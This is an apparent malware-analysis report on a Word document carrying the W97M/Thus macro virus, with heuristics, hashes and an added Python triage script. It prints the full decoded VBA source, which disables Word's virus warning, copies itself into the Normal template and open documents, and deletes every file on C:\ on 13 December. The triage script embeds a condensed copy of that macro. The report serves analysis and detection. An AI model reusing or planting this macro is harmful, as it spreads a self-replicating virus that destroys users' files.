Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cd0e9c6c7e1b811d…

MALICIOUS

Office (OLE)

Size: 110.9 KB  Created: 2009-08-31 19:14:00  Authoring application: Microsoft Word 11.5.6  First seen: 2016-09-01
MD5: 547e667e654d439456ca84d3dcb6759e  SHA-1: 60bc331e45235c46a925de4b88b77e456c25f0da  SHA-256: cd0e9c6c7e1b811d8a42ece8a283075b103039487a551b1f7998211356d900fb
Risk score: 248

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic  T1562.001 Disable or Modify Tools  T1485 Data Destruction

The sample carries a VBA macro of the W97M/Thus family (ClamAV names it Doc.Trojan.Thus-8) that runs from Document_Open and is re-entered from Document_Close and Document_New. On every trigger it sets Application.Options.VirusProtection = False to silence Word's macro-virus warning, then uses the VBE object model (CodeModule.DeleteLines and CodeModule.InsertLines) to copy itself into the Normal template and into every open document whose first module does not already carry the 'Thus_001' marker on line 2, saving the template so the infection persists across sessions. On 13 December it additionally enumerates every file under C:\ with Application.FileSearch and deletes each one with Kill; because the whole routine runs under On Error Resume Next, files it cannot delete are skipped silently rather than aborting the loop. Self-replication into the global template has no benign document use, so the verdict stands independently of the AV signature. On any host that opened this file, check the Normal template (Normal.dot, or Normal.dotm on newer Word) for the 'Thus_001' marker before declaring the host clean.

Heuristics 5

  • ClamAV: Doc.Trojan.Thus-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-8
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        On Error Resume Next
        Application.Options.VirusProtection = False
        If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    'Thus_001'
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x07 bytes found: 96 consecutive 0x07 bytes at file offsets 0x18DC through 0x193B
    Disassembly
    Attempted x86 opcode disassembly (every byte in the run decodes to the same one-byte instruction)
    000018DC  07                pop es
    000018DD  07                pop es
    000018DE  07                pop es
    (93 further identical lines, 000018DF through 0000193A, omitted)
    0000193B  07                pop es
    Analyst note: treat this finding as low confidence. The sample delivers its payload as VBA executed by the Word host and needs no memory-corruption exploit, a 96-byte run of a single byte value in a 110 KB binary Word file is consistent with ordinary structure or padding, and the heuristic is raw-byte pattern matching with no shellcode stage identified after the run. The verdict rests on the macro findings above, not on this one.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2374 bytes
SHA-256: 06d8b38a317377d80acbc28cd178ec410ded92e796ab90457409f9756b921d85
Detection
ClamAV: Doc.Trojan.Thus-8
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script (this script is 58 lines long, so it is shown in full)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_001'
    On Error Resume Next
    Application.Options.VirusProtection = False
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
    .CodeModule.CountOfLines
    End If
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
    .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
    .Item(1).CodeModule.CountOfLines)
    End If
    If NormalTemplate.Saved = False Then NormalTemplate.Save
    For k = 1 To Application.Documents.Count
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .CodeModule.DeleteLines 1, Application.Documents.Item(k) _
    .VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    End If
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
    .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
    .VBComponents.Item(1).CodeModule.CountOfLines)
    End If
    Next k
    If (Day(Now()) = 13) And (Month(Now()) = 12) Then
    With Application.FileSearch
        .NewSearch
        .LookIn = "C:\"
        .SearchSubFolders = True
        .FileName = "*.*"
        .MatchTextExactly = False
        .FileType = msoFileTypeAllFiles
        If .Execute > 0 Then
        For i = 1 To .FoundFiles.Count
        Kill .FoundFiles(i)
        Next i
        End If
    End With
    End If
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
Private Sub Document_New()
    Document_Open
End Sub
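The triage helpers below are an added example written for this report; they are not code from the scanner, from oletools or from the sample. They implement the OLE_VBA_MACRO_VIRUS_REPLICATION test described in the heuristics section over decoded VBA text (what olevba's extract_macros yields), and they reproduce the virus's own line-2 marker check so it can be run against a host's Normal template. The macro embedded in the block is a constructed, condensed copy of the extracted script above, not the artifact itself; the pattern names, the scoring rule and the scan_document helper are this example's assumptions (the 'Thus_001' marker string comes from the script).

```python
"""Triage helpers for the OLE_VBA_MACRO_VIRUS_REPLICATION finding (added example).

Operates on decoded VBA source text, so the constructed sample below runs
offline. Pattern names are this example's own labels, not scanner identifiers.
"""
import re

# olevba keeps the 'Attribute VB_*' header lines that the VBE editor hides;
# drop them so line numbers match what the macro sees through CodeModule.Lines.
_ATTRIBUTE = re.compile(r"^\s*Attribute\s+VB_\w+\s*=", re.I)

PATTERNS = {
    # self-replication: rewriting module code through the VBE object model
    "vbe_code_write": re.compile(
        r"CodeModule\s*\.\s*(InsertLines|DeleteLines|AddFromString|ReplaceLine)\b"
        r"|\.OrganizerCopy\b", re.I),
    "targets_normal_template": re.compile(r"\bNormalTemplate\b|\bNormal\.dotm?\b", re.I),
    # AV tampering: switches off Word's macro-virus warning
    "disables_virus_protection": re.compile(
        r"Options\s*\.\s*VirusProtection\s*=\s*False", re.I),
    # auto-executing entry points
    "auto_exec_handler": re.compile(
        r"\b(Document_Open|Document_Close|Document_New|Auto(Open|Close|New|Exec))\b", re.I),
    # logic bomb: a code path gated on the current date
    "date_trigger": re.compile(
        r"\b(Day|Month|Year|Weekday)\s*\(\s*Now\s*\(\s*\)\s*\)\s*=", re.I),
    # destructive payload: enumerate and delete files
    "file_destruction": re.compile(r"\bKill\b|\bFileSearch\b", re.I),
}


def vbe_lines(src):
    """Module lines as the VBE numbers them (Attribute headers removed)."""
    return [ln for ln in src.splitlines() if not _ATTRIBUTE.match(ln)]


def normalize(src):
    """Join ' _' line continuations so a member call split over lines matches as one."""
    return re.sub(r"[ \t]_\r?\n[ \t]*", " ", "\n".join(vbe_lines(src)))


def triage(src):
    """Return {pattern_name: match_count} for every pattern present in the source."""
    text = normalize(src)
    return {name: len(rx.findall(text)) for name, rx in PATTERNS.items() if rx.search(text)}


def is_macro_virus(hits):
    """Defining test from the report: the macro rewrites VBA code AND either
    seeds the global template or hooks an auto-executing document event."""
    return "vbe_code_write" in hits and (
        "targets_normal_template" in hits or "auto_exec_handler" in hits)


def infection_marker(src, marker="'Thus_001'"):
    """Reproduce the virus's own check, Lines(2, 1) = marker, on decoded source."""
    lines = vbe_lines(src)
    return len(lines) >= 2 and lines[1].strip() == marker


def scan_document(path):
    """Triage a .doc/.dot on disk with oletools (imported lazily so the offline
    sample run needs no extra package; this helper is not exercised below)."""
    from oletools.olevba import VBA_Parser
    parser = VBA_Parser(path)
    try:
        if not parser.detect_vba_macros():
            return {}
        src = "\n".join(code for _, _, _, code in parser.extract_macros())
    finally:
        parser.close()
    return triage(src)


# Constructed sample: a condensed copy of the extracted macro, not the artifact.
SAMPLE_THUS = """Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Private Sub Document_Open()
'Thus_001'
    On Error Resume Next
    Application.Options.VirusProtection = False
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
    .CodeModule.CountOfLines
    End If
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
    .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
    If (Day(Now()) = 13) And (Month(Now()) = 12) Then
    With Application.FileSearch
        .LookIn = "C:\\"
        If .Execute > 0 Then
        For i = 1 To .FoundFiles.Count
        Kill .FoundFiles(i)
        Next i
        End If
    End With
    End If
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
"""

# Constructed benign control: an auto-exec handler that only refreshes fields.
SAMPLE_BENIGN = """Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    ActiveDocument.Fields.Update
End Sub
"""

if __name__ == "__main__":
    for label, src in (("thus", SAMPLE_THUS), ("benign", SAMPLE_BENIGN)):
        hits = triage(src)
        print(label, hits, "virus:", is_macro_virus(hits), "marker:", infection_marker(src))
```

For a host that opened the sample, point scan_document at the user's Normal template (Normal.dot under the Word 97-2003 templates folder, Normal.dotm on later versions) and at any document that was open at the time; infection_marker on the same decoded source tells you whether the copy already carries 'Thus_001', which is exactly the condition the virus uses to decide whether to overwrite a module.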